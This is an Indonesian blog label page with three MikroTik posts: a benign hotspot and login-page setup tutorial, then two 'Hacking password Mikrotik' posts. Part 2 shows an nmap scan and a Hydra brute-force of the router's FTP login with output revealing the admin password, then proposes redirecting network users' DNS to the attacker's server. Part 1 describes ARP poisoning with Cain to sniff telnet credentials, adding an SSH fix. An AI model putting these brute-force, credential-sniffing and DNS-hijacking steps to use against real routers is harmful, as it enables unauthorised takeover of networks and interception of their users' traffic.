Tampilkan postingan dengan label Mikrotik. Tampilkan semua postingan
Tampilkan postingan dengan label Mikrotik. Tampilkan semua postingan

Tutorial Membuat HOTSPOT Dengan MIKROTIK + Login MOD

Posted by Unknown Senin, 11 November 2013 1 komentar
Perlengkapan yang dibutuhkan :
  • Modem (Yang sudah terhubung INTERNET)
  • MikroTik RB / OS
  • Wireless Adapter / Access Point
  • 2 Kabel UTP
  • Software Winbox
  • Software WinSCP
  • File login.html yang sudah di Modifikasi
Topologi Jaringan yang akan digunakan untuk Membuat Konfigurasi Jaringan Hotspot Di MikroTik Dengan Winbox.

Konfigurasi Hotspot :
  • Buka Winbox dan mencari Mac Address untuk login, klick MAC Addressnya bukan IP Address nya.
  • Setelah memilih Mac Address , login menggunakan default yaitu , Login : Admin . Password : [Kosong]
  • Setelah berhasil login, kita dapat melihat Interfaces MikroTik tersebut di winbox.
  • Edit nama Interfaces agar mudah melakukan konfigurasi, ether1 = Internet , ether2 = Wifi Hotspot, lihat gambar di bawah ini.
  • Berikutnya kita harus mengisikan IP Address pada masing-masing ether yg sudah di beri nama. Menu IP - Address - [+]
  • Masukan IP Address untuk ether Wifi Hotspot 192.168.1.1/24, kemudian klik OK.
  • Setelah memasukkan IP Address ether Wifi Hotspot, Sekarang kita menggunakan DHCP Client untuk mendapatkan IP Internet. Menu - IP - DHCP Client - [+]
  • Pilih lah Interfaces "INTERNET" dan klik OK.
  • Untuk melihat IP address yang telah di konfigurasi. Menu - IP - Address - Akan muncul Address List. lihat gambar di bawah ini.
  • Selesai Konfigurasi IP setiap ether, sekarang kita akan membuat Hotspot. Menu - IP - Hotspot - Hotspot Setup. Lihat gambar di bawah ini.
  • Pilih HotSpot Interface - WIFI HOTSPOT.
  • Klik Next karena IP interface Wifi Hotspot sudah seperti yang telah di konfigurasi dan beri centang pada Masquerade Network.
  • Isi Address Pool. Pada tahap ini kita menentukan IP berapa sampai dengan IP berapa yang dapat menggunakan Wifi Hotspot. Contoh : 192.168.1.10-192.168.1.100 ( hanya IP dari 192.168.1.10 sampai dengan IP 192.168.1.100 yang dapat menggunakan Wifi Hotspot ).
  • Selanjutnya konfigurasi SSL, karena kita tidak menggunakan SSL, pada select Certificate, pilih saja none lalu klik next.
  • Konfigurasi IP SMTP Server. Jika anda memiliki SMTP Server, silahkan masukkan IP SMTP Server anda, karena saya tidak punya maka langsung Next.
  • Selanjutnya Konfigurasi DNS, Karena DNS sudah auto detect dari Interface Internet, maka tidak perlu di konfigurasi lagi. Langsung klik Next. (jika belum ada, silahkan isi DNS yang anda inginkan).
  • Untuk DNS Name di kosongkan saja dan klik Next. (jika anda ingin memberi nama, silahkan).
  • Berikut tahap membuat user hotspot login. User : admin dan Password : kosong. (isi dengan yang anda inginkan). Kemudian Klik Next.
  • Setup membuat Hotspot sudah selesai. Seperti terlihat pada gambar di bawah ini.
  • Dan ini hasil membuat Hotspot tadi. Lihat gambar di bawah.
  • Klik pada menu Server Profiles dan isi DNS Name untuk Hotspot Login dan melimit bandwidth user Hotspot, seperti terlihat pada gambar di bawah.
  • Membuat user login lebih banyak lagi, Pilih Tab [Users] - [+] - Isikan Name ( Sebagai User ) Password ( Kode Pengaman ).
  • Dan seperti ini hasil kita membuat user Hotspot login.
  • Kemudian lakukan percobaan pada client yang sudah terkoneksi Wireless/Access Point. Buka browser ketik www.google.com, maka secara otomatis akan direct ke sbp-hotspot/login karena DNS Name yang telah di konfigurasi tadi.
  • Setelah memasukkan Username beserta Password dan berhasil login akan muncul seperti gambar di bawah ini.
Setelah tampilan di atas muncul maka Internet sudah dapat digunakan, akan tetapi Login Hotspot masih terlalu simple, dan kita akan melanjutkan cara mengganti Login Hotspot seperti yang kita inginkan. Ikuti step-step berikut untuk mengganti tampilan Login Hotspot.

Modifikasi Login Hotspot :
Download applikasi WinSCP di atas, install pada komputer anda dan jalankan. Kemudian isi sesuai data MikroTik anda . . .
Hostname : IP Mikrotik.
Username : admin
Password : Password mikrotik
Port number : jangan diubah, biarkan 22

Setelah login akan tampil seperti gambar di bawah ini . . .

Klik file "login.html" yang ada disebelah kanan, lalu drag and drop ke sebelah kiri. Maka file tersebut sudah ada di komputer anda. Sekarang tinggal mengedit file login.html tersebut seperti yang kita inginkan. Jika sudah selesai mengedit file login.html anda, kemudian drag n drop lagi file login.html yang sudah di edit ke sebelah kanan dan piih "overwrite".

Jika sudah selesai melakukan step di atas maka kita bisa coba akses menggunakan hotspot client dan yang akan tampil halaman login seperti yang anda buat tadi. Ini contoh editan Hotspot Login Page saya, silahkan download link di atas jika anda ingin menjadikan refrensi pembelajaran cara membuat login.html hotspot mikrotik.

Terima kasih telah berkunjung, dan semoga Tutorial Membuat HOTSPOT Dengan MIKROTIK ini bermanfaat :)

Baca Selengkapnya ....

Hacking Password Mikrotik - Part 2

Posted by Unknown Jumat, 27 Januari 2012 0 komentar
Hacking password Mikrotik secara langsung dengan memanfaatkan titik terlemah

Tidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.

Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata sukses. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi?

Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.

Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik

C:\Documents and Settings\serverdata>nmap -A 192.168.1.174

Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time

Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp MikroTik router ftpd 3.20
22/tcp open ssh OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp open telnet Linux telnetd
80/tcp open http MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open winbox MikroTik WinBox management console
8080/tcp open http-proxy Mikrotik http proxy
8291/tcp open unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router

HOP RTT ADDRESS
1 0.13 ms 192.168.1.174

OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds

Ternyata banyak port dan service yang terbuka di mikrotik. :D

Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.

C:\Documents and Settings\serverdata>

H:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174 login: admin password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26

Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router.


Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.


sekian dulu, cayooo . . . .

Baca Selengkapnya ....

Hacking password mikrotik - part 1

Posted by Unknown Senin, 23 Januari 2012 0 komentar

Hacking password mikrotik memanfaatkan celah pada telnet


Perkembangan remote untuk administrator sudah berkembang pesat, tapi tidak menutup kemungkinan ada administrator mikrotik yang masih menggunakan telnet untuk remote ke mikrotiknya dengan berbagai alasannya seperti misal lebih universal, seperti dimana di windows sudah ada telnet clientnya yang dapat dipanggil tanpa menggunakan tool dari luar dan sebagainya.

Penggunaan telnet pada mikrotik dapat mengakibatkan password mikrotik di sniffing.

Contoh yang penulis lakukan dalam melakukan sniffing password telnet dengan CAIN.

Setelah penulis melakukan poisoning pada IP router mikrotik dan kemudian si administrator melakukan login ke mikrotik melalui telnet, penulis cukup masuk pada bagian passwords lalu telnet akan tampil baris seperti dibawah ini lalu penulis lakukan klik kanan lalu view.

Tampilannya setelah dilakukan view.

mendapatkan password mikrotik dan anda tinggal login dengan password tersebut untuk melakukan login.

Solusi : Untuk mencegah terjadinya tindakan pengambilan password dengan menggunakan sniffing maka gunakan SSH untuk remote secara console.

Cayoo . . . .


Baca Selengkapnya ....
Trik SEO Terbaru support Online Shop Baju Wanita - Original design by Bamz | Copyright of android jones.